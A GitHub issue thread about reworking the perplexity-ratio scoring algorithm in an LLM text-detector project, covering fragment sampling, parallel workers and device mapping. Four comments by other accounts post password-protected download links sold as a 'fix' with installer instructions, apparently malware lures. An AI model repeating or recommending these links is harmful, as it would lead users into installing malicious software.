### ISSUE TITLE
Perplexity ratio score update

### ISSUE THREAD

**Issue by gperdrizet** [gperdrizet/llm_detector#60]
Think it's time to make some updates to the perplexity ratio scoring algorithm. The underlying math is fine the way it is, but after working with the data for a bit, the function(s) itself could use some improvements. Some things to think about:

- **Fragment length**: could do a better job of sampling such that the fragment length distributions for the human and synthetic text datasets are more similar. We also could be smarter about our length cutoff, e.g. score really long fragments on CPU etc. Also, think about what to do with very short fragments. I just know people are gonna want to use this on tweets.
- **Parallelism**: It'd be nice to have the ability to run multiple workers. Right now, I think we probably cant handle more than 2 on the GPUs: that's total models loaded. But we could certainly fit more in system memory if we are doing CPU scoring. Also, looking forward to hopefully having some real cloud compute soon...
- **Word order**: been thinking a lot about order lately. Couple of weird things to try out in this area, both in terms of sampling and also scoring.

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by gperdrizet** [comment]
@pilot5657 Yeah, right. Why? What is that? This is most shady comment I've ever seen. Hahaha.

**Comment by gperdrizet** [comment]
Making good progress. Added a perplexity score v2 option to \_\_main\_\_.py in benchmarking. It runs a whole new perplexity ratio scoring algorithm. Underlying math is the same, but tons of improvements to everything else:

1. We can now resume prior runs without re-sampling from records we have already touched.
2. Sampling/scoring is done in a subprocess on batches of records and can be run with multiple worker processes. This will give a nice data parallelism speed-up on machines that have the resources.
3. We generate a 50:50 ratio of human to synthetic text fragments.
4. The lengths of fragments drawn from a given record are perfectly matched for the human and synthetic text.
5. When we hit the end of the human or synthetic text from a record, whichever is shorter, sampling from that record stops.
6. Sampling is counterbalanced across the input text. In ~50% of cases (based on a coin flip) we reverse the input texts before sampling, then un-reverse the fragments afterward. This results in slicing the fragment from the end of the text toward the beginning half the time preventing the preferential inclusion of the beginning of the text.

Right now, it's running (slowly) on CPU only. Only thing left to do is work on device mapping. Using the CPU allows us to process almost arbitrarily long inputs (longer than mostly everything in the corpus anyway). But I'd like to try at least with the 'auto' device map from HuggingFace. In benchmarking it let us process inputs of up to about 1000 words but with a good speed-up over CPU. Once that is done, it'll be time to move on.

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
